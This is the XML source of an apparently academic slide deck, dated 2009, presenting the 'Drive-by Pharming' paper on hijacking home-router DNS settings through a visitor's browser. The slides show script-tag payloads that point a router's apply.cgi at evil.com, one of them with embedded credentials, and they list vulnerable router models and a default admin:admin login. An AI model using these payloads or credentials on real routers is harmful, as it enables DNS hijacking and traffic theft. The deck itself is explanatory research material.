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  <p:sldId id="270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6" autoAdjust="0"/>
    <p:restoredTop sz="94659" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-51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5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American Web Users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9918570629490989"/>
          <c:y val="0.18561056986520758"/>
          <c:w val="0.59069962566154666"/>
          <c:h val="0.6107233417856665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American Web Users</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:explosion val="10"/>
          <c:dPt>
            <c:idx val="2"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="0.0%" sourceLinked="0"/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Val val="1"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>JS + Password Password</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>JS + Default Password</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>No JS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0.47500000000000003</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.47500000000000003</c:v>
                </c:pt>
                <c:pt idx="2" formatCode="0%">
                  <c:v>5.000000000000001E-2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b"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="6.2961576524245957E-2"/>
          <c:y val="0.82918857600427065"/>
          <c:w val="0.87407684695150822"/>
          <c:h val="0.15386227145335646"/>
        </c:manualLayout>
      </c:layout>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr sz="1100"/>
          </a:pPr>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:schemeClr val="lt1"/>
    </a:solidFill>
    <a:ln w="1905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6F5E1-B6DA-415D-929F-44605C775EE8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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64B128-206F-4662-BF2C-E1CC212B69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4B128-206F-4662-BF2C-E1CC212B694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28D3-9027-41D4-87C1-978984CCFF1E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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52D08-9AD7-4455-8738-AA794E16979C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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3B13-C633-4A39-AF92-75BBC32CEE04}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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CE93D-57BB-46FE-8266-8E67EA3AAF08}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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FC69D-05A2-4806-B7EC-09A882EC8908}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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D9FB-75A3-4A83-91EE-64BA36AFBDFE}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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152F-F5ED-4B53-A8D1-A7970FD9C44A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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C98D-6DB9-489A-958A-A86F0F305A3B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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BFADB4-8733-4648-8A42-9D84E3EB4BA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Anh Le - UC Irvine - 2009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0C09-C7BE-4B09-BD24-B6FCC97E9BFD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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4D35-B8AF-4B0B-91F8-056185D2796A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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9BFADB4-8733-4648-8A42-9D84E3EB4B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A7B864C-F197-4268-9E40-EEBF7EF89E6F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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ADB4-8733-4648-8A42-9D84E3EB4B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90671BB-D731-4759-A314-572772A64B69}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/13/2009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Anh Le - UC Irvine - 2009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9BFADB4-8733-4648-8A42-9D84E3EB4B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8.wmf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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Drive-by Pharming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S. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Stamm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, Z. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Ramzan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, and M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Jakobsson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Presented by Anh Le</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pharming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How is it possible?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Get Configuration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Off-site script inclusion</a:t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How about password-protected?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85800" y="2667000"/>
            <a:ext cx="6109365" cy="3385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http://10.0.0.1/apply.cgi?dns=new-dns-server.com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4038600"/>
            <a:ext cx="7960834" cy="3385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script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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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http://10.0.0.1/apply.cgi?dns=evil.com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”&gt;&lt;/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script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5334000"/>
            <a:ext cx="8001000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script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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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usr:pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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@10.0.0.1/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600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                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1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apply.cgi?dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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=evil.com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”&gt;&lt;/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script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Anh Le - UC Irvine - 2009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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pharming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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33528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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assumptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>JavaScript-Enabled Web Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Default Password Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="603504" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerable Routers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Netgear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> WGR614</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>D-Link DI-524</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Linksys WRT54G</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Cisco 806, 826, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="905256" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>…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</p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3657600" y="1676400"/>
          <a:ext cx="4648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Anh Le - UC Irvine - 2009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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pharming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (cont.)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Verizon</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Modem + Router]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MI424-WR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin:admin</a:t>
            </a:r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/>
          <a:srcRect l="8333" t="10378" r="46584" b="58899"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="3962400"/>
            <a:ext cx="4419600" cy="16941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/>
          <a:srcRect l="8330" t="13469" r="56630" b="62488"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="1600200"/>
            <a:ext cx="4343400" cy="1676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Anh Le - UC Irvine - 2009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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Demo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C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj0432635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6588" y="2808288"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill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Anh Le - UC Irvine - 2009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926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Introduction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Preliminaries and Previous Work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Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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pPr marL="550926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Demo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New Attacks and Recent Events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Conclusion and Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926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Anh Le - UC Irvine - 2009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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>New Attacks and Recent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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New Attacks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Growing Zombies/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>By installing evil firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Viral Spread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Router auto-recruits routers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recent Events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err="1" smtClean="0"/>
              <a:t>Kaminsky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> DNS Vulnerability (July 2008)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>cache poisoning attacks on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (March 2009!)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l="1020" t="7011" r="62245" b="76663"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="5257800"/>
            <a:ext cx="54102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Anh Le - UC Irvine - 2009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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Conclusion and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292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Routers with default password management are easily compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Browsers as conduits of attacks to internal network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Army of router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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5715000" y="1752600"/>
            <a:ext cx="838200" cy="838200"/>
            <a:chOff x="6581775" y="1793875"/>
            <a:chExt cx="1841500" cy="1918997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8194" name="Picture 2" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj03984990000[1]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581775" y="1793875"/>
              <a:ext cx="1841500" cy="1692275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8195" name="Picture 3" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000[1]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467600" y="2743200"/>
              <a:ext cx="882650" cy="969672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5715000" y="3048000"/>
            <a:ext cx="2108098" cy="1346098"/>
            <a:chOff x="5943600" y="3124200"/>
            <a:chExt cx="2108098" cy="1346098"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="Firefox_64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58000" y="3886200"/>
              <a:ext cx="584098" cy="584098"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7" descr="Google-Chrome-64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553200" y="3124200"/>
              <a:ext cx="533400" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8" descr="internet explorer_64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943600" y="3733800"/>
              <a:ext cx="584098" cy="584098"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9" descr="Safari-64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467600" y="3276600"/>
              <a:ext cx="584098" cy="584098"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5562600" y="5105400"/>
            <a:ext cx="2819400" cy="1524000"/>
            <a:chOff x="5562600" y="5105400"/>
            <a:chExt cx="2819400" cy="1524000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Connector 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5867400" y="5715000"/>
              <a:ext cx="1905000" cy="152400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx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6705600" y="5715000"/>
              <a:ext cx="1066800" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx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553200" y="5410200"/>
              <a:ext cx="1219200" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx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/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6324600" y="5105400"/>
              <a:ext cx="533400" cy="609600"/>
              <a:chOff x="6581775" y="1793875"/>
              <a:chExt cx="1841500" cy="1918997"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Picture 2" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj03984990000[1].wmf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6581775" y="1793875"/>
                <a:ext cx="1841500" cy="1692275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Picture 3" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000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467600" y="2743200"/>
                <a:ext cx="882650" cy="969672"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="Group 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6400800" y="6019800"/>
              <a:ext cx="533400" cy="609600"/>
              <a:chOff x="6581775" y="1793875"/>
              <a:chExt cx="1841500" cy="1918997"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Picture 2" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj03984990000[1].wmf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6581775" y="1793875"/>
                <a:ext cx="1841500" cy="1692275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Picture 3" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000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467600" y="2743200"/>
                <a:ext cx="882650" cy="969672"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/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5562600" y="5562600"/>
              <a:ext cx="533400" cy="609600"/>
              <a:chOff x="6581775" y="1793875"/>
              <a:chExt cx="1841500" cy="1918997"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Picture 2" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj03984990000[1].wmf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6581775" y="1793875"/>
                <a:ext cx="1841500" cy="1692275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Picture 3" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000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467600" y="2743200"/>
                <a:ext cx="882650" cy="969672"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Group 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7543800" y="5257800"/>
              <a:ext cx="838200" cy="863600"/>
              <a:chOff x="533400" y="2667000"/>
              <a:chExt cx="1752600" cy="1778000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="Picture 10" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04247900000[1].wmf"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads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533400" y="2667000"/>
                <a:ext cx="1708150" cy="1778000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Picture 9" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000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47800" y="3429000"/>
                <a:ext cx="838200" cy="920839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Anh Le - UC Irvine - 2009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nh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1HE85B9A\MCj041602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90925" y="2439988"/>
            <a:ext cx="1927225" cy="1581150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill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Anh Le - UC Irvine - 2009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Authors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="markus_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48399" y="1676400"/>
            <a:ext cx="1468659" cy="1752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 descr="sid03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752600"/>
            <a:ext cx="1246060" cy="1676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7" descr="Zulfikar_Ramzan_10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1828800"/>
            <a:ext cx="1600200" cy="16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TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4343400"/>
            <a:ext cx="193995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Sid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stamm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>- Indiana University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>- Google Intern</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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3200400" y="4343400"/>
            <a:ext cx="222375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Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zulfikar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ramzan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
